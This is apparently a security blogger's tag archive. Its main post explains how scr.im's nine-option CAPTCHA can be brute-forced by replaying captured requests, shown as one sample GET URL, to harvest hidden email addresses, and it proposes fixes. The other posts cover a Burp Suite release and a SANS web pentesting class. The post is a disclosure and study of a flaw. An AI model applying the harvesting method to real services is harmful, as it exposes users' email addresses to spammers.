Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: web app

The secrets of scr.im

Update [12/10/2010]: Since writing this back in October 2009, I’ve written a Proof of Concept Python tool to exploit the vulnerabilities discussed. More information can be found here.

A few days back I was alerted to a new website that was offering a new way to hide your email address online. It sounded interesting so I headed over to the scr.im website and had a quick poke around. As you can guess, I’m a bit suspicious of these kind of services and web application security is what I do (at least recently). So there were a few things that really jumped out at me straight off in reference to the sites use of CAPTCHA.

scr.imNow I’m pretty sure a big portion of people reading this are already saying WTF just by looking at the above screenshot. This is not the way to use CAPTCHA. For a visitor to the site this is nice and quick, however for a script this is just a matter of playing the odds. The correct CAPTCHA has to be one of the 9 possible links displayed, certainly much better odds than attempting to crack the CAPTCHA itself. If a link is selected and it’s incorrect, the CAPTCHA screen can be reloaded (with new CAPTCHA options of course) and you can try again. Sure for a human it’s tedious to do this, it took me 11 tries to get through by simply always selecting the first CAPTCHA option (top left corner, Y9VJJ in the above screenshot). However for a scripted attack, this is a no brainer and shouldn’t take more than a few seconds. The slowest part would be the page reload. There doesn’t seem to be any timeout, lockout or any other such protections to prevent this kind of attack. Still the page reload is the bottleneck here.

burp_scrimThe above solution was too messy for me, and I hate nothing more than having to click buttons constantly, it bores me. So how can we do the same thing, but work more effectively, with less overhead. By taking a look at the scrim.js JavaScript you can see how the CAPTCHA buttons translate directly to POST requests. Although the value of the CAPTCHA is obfuscated, the code is simple enough to understand if you use BURP Suite to capture and examine the requests and responses. The Burp screenshot (LEFT) shows the POST request that sends the CAPTCHA together with a token number and some other information. Initially I thought this token value was used as a replay prevention function, however by capturing all 9 possible POST requests from a simple scr.im page (using Burp naturally), I found that you could send each request in sequence to the remote server until the correct CAPTCHA is found and the desired email address is returned.

As with most web applications the POST request isn’t strictly enforced on the server side. As such you can easily change this to a single GET request (e.g. http://scr.im/test?captcha=46UU8&action=view&token=e6f0006403ab0c714034f25bc571aa93&ajax=y) which makes things a little easier when scripting a solution.

The screenshots below show the responses from the scr.im server (both negative and positive).

 

scrim negative response

scrim negative response

 

 

scrim positive response

scrim positive response

 

 

As most of the heavy work is done on the client-side using JavaScript (obfuscation of the CAPTCHA value, etc..), I don’t think it would take much for a good scripter (that rules me out most likely) to script up something that could quite simply go through and harvest addresses from the site. Normally this wouldn’t surprise me much as spammers are harvesting emails all the time from various sources. However scr.im is placing itself as a way to “… protect your email address before sharing it, so only real people will use it …” That’s a problem, as most people will blindly think that the service must be secure.

Don’t get me wrong here, the idea is sound, and I’d really like to use something like this myself under certain circumstances (not for my primary accounts, but for some things certainly). So what can be done to fix things up .:

  • Add protection to prevent multiple options from being selected from the same CAPTCHA options (one-time token) *
    • Resolves: The possibility to select ALL 9 CAPTCHA options and scraping the responses
    • Issue: Doesn’t stop an attacker reloading and trying again
  • Add protection to stop more than X number of requests per URL, per second/minute *
    • Resolves: Brute-Force style attacks, automated attacks (to some extent)
    • Issue: Could cause DoS against peoples links
  • If the wrong CAPTCHA is selected X times, revert to traditional CAPTCHA entry *
    • Resolves: Brute-Force style attacks, automated attacks
    • Issues: Same issues as traditional CAPTCHA, breakable

* Won’t prevent all possible attacks if implemented alone

By mixing and matching the above solutions the attack vectors could easily be reduced, but never truly removed completely. However with the use of the 3×3 grid CAPTCHA there is always that 1 in 9 chance of the attacker choosing the correct CAPTCHA on the first try. Given these odds a single attacker could (in theory) harvest 11.11% of email addresses on the first attempt purely by guessing (even with the above implemented restrictions). Depending on how/what protections are implemented, the attacker could then come back 8 more times (within minutes, hours, days) to scrape the remaining addresses. There will certainly be email addresses not scraped, but for a spammer, this isn’t a big issue.

With this in mind, the only workable solution is to alter the way CAPTCHA protection is implemented to go with the more traditional “typing” option. It’s tried and tested, and although it’s not perfect, it does resolve a number of the issues faced by scr.im currently.

Disclaimer: I’m not a developer, and I have the utmost respect for those who take time to put up services like this online. Hopefully people can learn from what I’ve explained here, so we don’t all make the same mistakes next time.

New Burp suite

The Blog over at blog.portswigger.net has been buzzing for the last month about the new version of Burp Suite. After a short time in beta testing (with users of the professional version) it’s been released for those using the free version. I’ve had a quick look over the features and think that version 1.2 is a big step in the right direction.

I’ve flitted backwards between using OWASP’s Webscarab, and Burp Suite. As much as I’ve always wanted to go the free route and use Webscarab, something kept pulling me back to Burp. I guess it just makes things easier. The new version seems to fill in some gaps, and I’ll be looking at the pro license soon to really get the full benefit.

The professional version includes the new burp scanner (passive and active scanning) seems to fill a void a lot of people have been looking for. i.e. an affordable web-application scanner that actually works. No automated scan will find everything, but users of Burp suite already know that. so the addition of a scanner just seems to make sense at this point. One thing I wish was in the free version however was the save/restore session function. Then again, I can see why this is held back for the paying customers.

Some of the new features include .:

  • Site map showing information accumulated about target applications in tree and table form
  • Fully fledged web vulnerability scanner [Pro version only]
  • Suite-level target scope configuration, driving numerous individual tool actions
  • Display filters on site map and Proxy request history
  • Ability to save and restore state [Pro version only]
  • Suite-wide search function
  • Support for invisible proxying

Checkout the full details at www.portswigger.net

SANS Web App Penetration Testing and Ethical Hacking Class – DAY 4

SANS Web App Penetration Testing and Ethical Hacking Class – DAY 4

DAY 4:

Today was a long day… my hint for a SANS conference in Europe, is never going drinking with Terry Neal. No, seriously, save yourself before it’s too late ;) Still, it’s amazing what you can accomplish on 4 hours of sleep.

Today was finally the Exploitation day… and as we know exploitation is always the fun part (insert evil laugh here). The coverage of a WordPress vulnerability from last year was interesting, but needed a little bit more in-depth explanation of how it functions. Due to the limitation of the class running time though, I think that wasn’t really a possibility. Still, consider it as homework ;) Although this was a lab designed to cover blind SQL injection, the use of a pre-written script for the lab was a little disappointing. I’d like to have seen something with SQLBF or SQLmap personally.

The section on advanced script injection covered a lot of what I came to the course for. If I had a choice the whole 4 days would have been at this level. At the very end of the day we looked at a couple of exploitation frameworks (Attack API, BeEF and XSS Proxy). I’ve not had a chance to play with these much before, so it was good to get some hands-on time with the tool. Although I would have liked to look more at the Atack API setup and configuration. BeEF looks good, but lacks some functions that would improve the functionality. Given the chance I’ll write up some modules to fill the gap.

Overall the course was enjoyable, although a little basic for people already doing web-app testing on a regular basis. I’m looking forward to seeing how the SEC:542 course changes when it goes 6 days (see next years conference lists). I’m expecting something special from the InGuardian guys.

SANS Web App Penetration Testing and Ethical Hacking Class – DAY 3

SANS Web App Penetration Testing and Ethical Hacking Class – DAY 3

DAY 3:

Well day 3 has begun, and we’ve passed the half way mark. I’m expecting some serious in-depth parts over the next 2 days. The presentations last night were really interesting. Raul covered Bluetooth attacks, which was interesting on a number of levels. Some people attending didn’t seem to get it from a business point of view. The opinion of one person was that the manufacturers won’t make a more secure version of these devices because it would cost more, and therefore not get enough market share to be effective. A typical argument against security. What he failed to understand was that this is a business problem. As nasty as it is to have your conversations listened to, the real return on investment for attackers lays with attacking businesses. Therefore businesses need to demand the extra level of security for their Bluetooth devices, even if it costs €5 more than a normal device. This will filter down to the cheaper handsets, headsets and other devices after a while, and secure even the lowest end of the market. The second presentation covered NIC and Graphics card firmware, and what can be done to attack and control the firmware in these devices. An eye opener indeed, especially when you learn that an infected firmware can use PCI to PCI communications to bypass your firewall entirely. It’s still a little beyond today’s attackers to use this avenue, but it’s something well within the boundaries of a large government or well financed crime syndicate. Something to look out for in the future…

The day kicked off with some basics on user enumeration. The Burp suite byte/word level page comparison is interesting, and something I’ve used before for cookies, but not for comparing 2 server responses. Coverage of the usual suspects, SQL Injection (including blind SQL injection), Cross-Site Scripting and Cross-Site Request Forgery. The coverage on Web Services was a little sparse for my liking. We’re going to start seeing more of these in the wild during tests, and a in-depth overview with examples would have been nice. Still, you can’t have it all. I think we could have done with some more hands on today, but hopefully we’ll cover some of that in tomorrows Exploitation day ;)

Follow

Get every new post delivered to your Inbox.

Join 127 other followers